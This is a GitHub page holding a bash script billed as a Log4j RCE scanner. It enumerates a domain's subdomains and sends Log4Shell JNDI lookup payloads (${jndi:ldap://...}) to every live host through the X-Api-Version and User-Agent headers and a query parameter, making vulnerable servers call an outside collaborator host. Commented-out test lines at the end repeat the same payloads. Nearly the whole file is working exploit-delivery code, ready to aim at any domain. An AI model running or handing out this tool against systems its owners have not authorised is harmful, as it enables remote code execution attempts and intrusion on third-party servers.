forked from adilsoybali/Log4j-RCE-Scanner
-
Notifications
You must be signed in to change notification settings - Fork 0
/
log4j-rce-scanner.sh
92 lines (80 loc) · 4.66 KB
/
log4j-rce-scanner.sh
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
#! /bin/bash
# :::'###::::'########::'####:'##::::::::'######:::'#######::'##:::'##:'########:::::'###::::'##:::::::'####:
# ::'## ##::: ##.... ##:. ##:: ##:::::::'##... ##:'##.... ##:. ##:'##:: ##.... ##:::'## ##::: ##:::::::. ##::
# :'##:. ##:: ##:::: ##:: ##:: ##::::::: ##:::..:: ##:::: ##::. ####::: ##:::: ##::'##:. ##:: ##:::::::: ##::
# :##:::. ##: ##:::: ##:: ##:: ##:::::::. ######:: ##:::: ##:::. ##:::: ########::'##:::. ##: ##:::::::: ##::
# :#########: ##:::: ##:: ##:: ##::::::::..... ##: ##:::: ##:::: ##:::: ##.... ##: #########: ##:::::::: ##::
# :##.... ##: ##:::: ##:: ##:: ##:::::::'##::: ##: ##:::: ##:::: ##:::: ##:::: ##: ##.... ##: ##:::::::: ##::
# :##:::: ##: ########::'####: ########:. ######::. #######::::: ##:::: ########:: ##:::: ##: ########:'####:
# :.:::::..::........:::....::........:::......::::.......::::::..:::::........:::..:::::..::........::....::
# 01000001 01100100 01101001 01101100 01110011 01101111 01111001 01100010 01100001 01101100 01101001
# https://github.com/adilsoybali
# https://adilsoybali.com
# https://seccops.com
showHelp() {
cat << EOF
$(tput setaf 2)
Usage:
$0 -l httpxsubdomains.txt -b yrt45r4sjyoj19617jem5briio3cs.burpcollaborator.net
$0 -d adilsoybali.com -b yrt45r4sjyoj19617jem5briio3cs.burpcollaborator.net
-h, --help Display help
-l, --url-list List of domain/subdomain/ip to be used for scanning.
-d, --domain The domain name to which all subdomains and itself will be checked.
-b, --burpcollabid Burp collabrator client id address or interactsh domain address.
$(tput sgr0)
EOF
}
domainScan() {
echo -e "\n$(tput setaf 2 ; tput rev ; tput bold) Subfinder is working $(tput sgr0)\n" ; subfinder -silent -d sub.$domain >> sub.$domain ; echo -e "\n$(tput setaf 2 ; tput rev ; tput bold) Assetfinder is working $(tput sgr0)\n" ; assetfinder -subs-only $domain >> sub.$domain ; echo -e "\n$(tput setaf 2 ; tput rev ; tput bold) Amass is working $(tput sgr0)\n" ; amass enum -norecursive --silent -noalts -d $domain >> sub.$domain ; cat sub.$domain | sort -u | httpx -silent | while read url; do
echo 'curl -s --max-time 20 $url -H 'log4jPayload' > /dev/null' | sed "s|log4jPayload|'X-Api-Version: \${jndi:ldap://$burpcollabid/a}'|g" | sed "s|\$url|$url|g" | bash
echo 'curl -s --max-time 20 '$url/?test=log4jPayload' > /dev/null' | sed "s|log4jPayload|'\$\\\{{jndi:ldap://$burpcollabid/a\\\}}'|g" | sed "s|\$url|$url|g" | bash
echo 'curl -s --max-time 20 $url -H 'log4jPayload' > /dev/null' | sed "s|log4jPayload|'User-Agent: \${jndi:ldap://$burpcollabid/a}'|g" | sed "s|\$url|$url|g" | bash
echo -e "\033[104m[ DOMAIN ==> $url ]\033[0m" "\n" "\033[92m Method 1 ==> X-Api-Version: running-Ldap-payload" "\n" " Method 2 ==> Useragent: running-Ldap-payload" "\n" " Method 3 ==> $url/?test=running-Ldap-payload" "\n\033[0m";done
}
listScan() {
cat $list | sort -u | httpx -silent | while read url; do
echo 'curl -s --max-time 20 $url -H 'log4jPayload' > /dev/null' | sed "s|log4jPayload|'X-Api-Version: \${jndi:ldap://$burpcollabid/a}'|g" | sed "s|\$url|$url|g" | bash
echo 'curl -s --max-time 20 '$url/?test=log4jPayload' > /dev/null' | sed "s|log4jPayload|'\$\\\{{jndi:ldap://$burpcollabid/a\\\}}'|g" | sed "s|\$url|$url|g" | bash
echo 'curl -s --max-time 20 $url -H 'log4jPayload' > /dev/null' | sed "s|log4jPayload|'User-Agent: \${jndi:ldap://$burpcollabid/a}'|g" | sed "s|\$url|$url|g" | bash
echo -e "\033[104m[ DOMAIN ==> $url ]\033[0m" "\n" "\033[92m Method 1 ==> X-Api-Version: running-Ldap-payload" "\n" " Method 2 ==> Useragent: running-Ldap-payload" "\n" " Method 3 ==> $url/?test=running-Ldap-payload" "\n\033[0m";done
}
while [[ "$1" =~ ^- && ! "$1" == "--" ]]; do case $1 in
-l | --url-list )
list="$2"
if [[ "$3" == "-b" || "$3" == "--burpcollabid" ]]; then
burpcollabid="$4"
else
showHelp
exit
fi
listScan
exit
;;
-d | --domain )
domain="$2"
if [[ "$3" == "-b" || "$3" == "--burpcollabid" ]]; then
burpcollabid="$4"
else
showHelp
exit
fi
domainScan
exit
;;
*)
showHelp
exit
;;
esac; shift; done
if [[ "$1" == '--' ]]; then
shift
else
showHelp
exit
fi
# tested 1
# echo 'curl -s $url -H 'log4jPayload'' | sed "s|log4jPayload|'X-Api-Version: \${jndi:ldap://$burpcollabid/a}'|g" | sed "s|\$url|$url|g" | bash
# tested 2
# echo 'curl -s '$url/?test=log4jPayload'' | sed "s|log4jPayload|'\$\\\{{jndi:ldap://$burpcollabid/a\\\}}'|g" | sed "s|\$url|$url|g" | bash
# tested 3
# echo 'curl -s $url -H 'log4jPayload'' | sed "s|log4jPayload|'User-Agent: \${jndi:ldap://$burpcollabid/a}'|g" | sed "s|\$url|$url|g" | bash